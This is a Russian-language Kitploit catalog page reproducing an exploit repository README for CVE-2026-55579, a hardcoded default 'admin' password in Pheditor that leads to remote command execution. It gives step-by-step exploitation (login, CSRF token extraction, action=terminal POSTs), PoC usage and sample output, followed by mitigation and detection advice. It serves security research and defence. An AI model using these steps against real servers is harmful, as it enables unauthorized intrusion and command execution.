Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-55579 — CVE-2026-55579 – Неаутентифицированный RCE в Pheditor через жестко заданный пароль по умолчанию «admin». Полный эксплойт на Python с загрузкой файлов и выполнением команд в терминале. Без зависимостей. | Kitploit
Инструменты/GitHubGitHub/ch4120n/cve-2026-55579
Атаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingРазработка Полезной НагрузкиЛаборатории и Практика
GitHubch4120n/cve-2026-55579

CVE-2026-55579

CVE-2026-55579 – Неаутентифицированный RCE в Pheditor через жестко заданный пароль по умолчанию «admin». Полный эксплойт на Python с загрузкой файлов и выполнением команд в терминале. Без зависимостей.

131 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

CVE-2026-55579 — Pheditor: жестко закодированный пароль по умолчанию с RCE

CVE CVSS Status Auth

TL;DR: Pheditor (все версии) поставляется с жестко закодированным паролем администратора по умолчанию (admin), встроенным в исходный код. Принудительная смена пароля при первом входе отсутствует — только визуальное предупреждение. Любой неаутентифицированный злоумышленник может войти как администратор и использовать встроенную панель терминала (action=terminal) для выполнения произвольных команд ОС с привилегиями веб-сервера. В сочетании с возможностью загрузки файлов это дает неаутентифицированное удаленное выполнение кода (RCE).


Содержание

  1. Обзор уязвимости
  2. Основная причина
  3. Сценарий эксплуатации
  4. Быстрый старт и воспроизведение
  5. Воздействие
  6. Устранение
  7. Обнаружение
  8. Авторы и отказ от ответственности

Обзор уязвимости


Основная причина

Уязвимость возникает из-за жестко закодированного хэша SHA‑512 пароля admin внутри pheditor.php (строка 11):

root@kitploit:~
define('PASSWORD', 'c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec');

Этот хэш соответствует:

root@kitploit:~
echo -n 'admin' | sha512sum

Почему это критично:

  1. Пароль никогда не принуждается к смене – приложение только отображает предупреждающий баннер (строки 1956–1958 в pheditor.php).
  2. С помощью admin/admin злоумышленник может войти и получить полный доступ к:
    • Панель терминала – выполняет произвольные системные команды (action=terminal)
    • Загрузка файлов – загружает произвольные файлы (action=upload)
    • Редактор файлов – читает и записывает любые файлы в пределах прав веб-сервера (action=open/action=save)

Отсутствуют ограничение скорости, блокировка и дополнительные факторы аутентификации.


Сценарий эксплуатации

Атака очень проста и не требует угадывания:

  1. Аутентификация – отправка POST-запроса на pheditor.php с параметром pheditor_password=admin. Сервер устанавливает cookie сессии.
  2. Извлечение CSRF-токена – получение главной страницы и парсинг переменной token в JavaScript.
  3. RCE через терминал – отправка POST-запроса с:
    • action=terminal
    • token=<извлеченный>
    • command=<команда ОС>
    • dir= (необязательно)
  4. Вывод – результат выполнения команды возвращается внутри HTML-тегов <pre> и может быть легко распарсен.

В качестве альтернативы злоумышленник может загрузить веб-шелл или перезаписать файлы приложения.


Быстрый старт и воспроизведение

1. Запуск уязвимой лабораторной среды

Клонируйте официальный репозиторий и запустите локальный сервер:

root@kitploit:~
git clone https://github.com/pheditor/pheditor.git /tmp/pheditor
cd /tmp/pheditor
php -S localhost:8080 pheditor.php &

2. Выполнение PoC

Предоставленный эксплойт на Python использует только стандартную библиотеку Python (без внешних зависимостей). Он включает CLI на основе argparse, расширенную обработку ошибок, режим подробного вывода и контроль тайм-аута.

root@kitploit:~
python3 exploit.py http://localhost:8080/pheditor.php "id; hostname; whoami"

3. Ожидаемый вывод

root@kitploit:~
[*] Выполняется вход с паролем: admin
[+] Вход успешен
[*] Извлечение CSRF-токена...
[+] Токен: a1b2c3d4e5f6...
[*] Выполняется: id; hostname; whoami

==================================================
Вывод команды:
==================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ubuntu
www-data
==================================================

Воздействие

Успешная эксплуатация дает злоумышленнику:

  • Полный доступ к файловой системе (чтение/запись/удаление) – компрометация кода приложения, конфигурации и данных.
  • Выполнение произвольных команд – позволяет устанавливать бэкдоры, перемещаться во внутренние сети или извлекать конфиденциальную информацию.
  • Повышение привилегий – если веб-сервер работает от привилегированного пользователя (часто root), злоумышленник получает полный контроль над хостом.
  • Полная потеря конфиденциальности, целостности и доступности – что отражено в оценке CVSS.

Учитывая, что Pheditor часто используется в средах разработки или как легковесный файловый менеджер, злоумышленники могут легко найти и использовать его для получения начальной точки проникновения.


Устранение

  1. Немедленные действия: Смените пароль по умолчанию сразу после установки. Используйте надежный уникальный пароль.
  2. Отключите функциональность терминала, если она не является строго необходимой (удалите панель терминала из интерфейса или добавьте флаг конфигурации для ее отключения).
  3. Примените патч от вендора, как только он станет доступен (поддерживающий уведомлен, ожидается исправление).
  4. Защита в глубину:
    • Ограничьте доступ к интерфейсу Pheditor с помощью IP-белого списка или VPN.
    • Запускайте веб-сервер с минимальными правами (не от root).
    • Мониторьте журналы доступа на предмет подозрительных паттернов (например, pheditor_password=admin).

Обнаружение

Мониторьте вашу среду на наличие индикаторов компрометации:

  • Журналы доступа: Ищите POST-запросы к pheditor.php с параметром pheditor_password=admin или action=terminal.
  • Изменения файлов: Неожиданные новые файлы (например, веб-шеллы) или изменения существующих файлов приложения.
  • Выполнение процессов: Необычные команды, выполняемые пользователем веб-сервера, особенно с участием sh, bash, nc, curl или wget.
  • Исходящие соединения: Неожиданные исходящие соединения от веб-сервера (обратные шеллы, эксфильтрация данных).

Более подробный разбор цепочки эксплуатации и дополнительные полезные нагрузки см. в ANALYSIS.md.


Авторы и отказ от ответственности

  • Владелец репозитория: Ch4120N
  • Разработка эксплойта и исследование: Ch4120N
  • Справочная информация: GHSA-p4h7-p9rj-2pq2

Отказ от ответственности: Этот репозиторий содержит доказательство концепции (PoC), предназначенное строго для оборонительных, образовательных и авторизованных целей тестирования безопасности. Не используйте этот код против систем, которые вам не принадлежат или на тестирование которых у вас нет явного письменного разрешения. Авторы не несут ответственности за неправомерное использование.

Скачать инструмент
АтрибутПодробности
Идентификатор CVECVE-2026-55579
Затронутое ПОPheditor (все версии вплоть до текущего HEAD)
Исправленная версияПока отсутствует (патч от вендора не выпущен; требуется обходное решение)
Класс уязвимостиCWE-798: Использование жестко закодированных учетных данных
Оценка CVSS v3.19.8 (Критический) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
АутентификацияНе требуется – учетные данные по умолчанию общеизвестны
ПодтверждениеПодтверждено на свежей установке Pheditor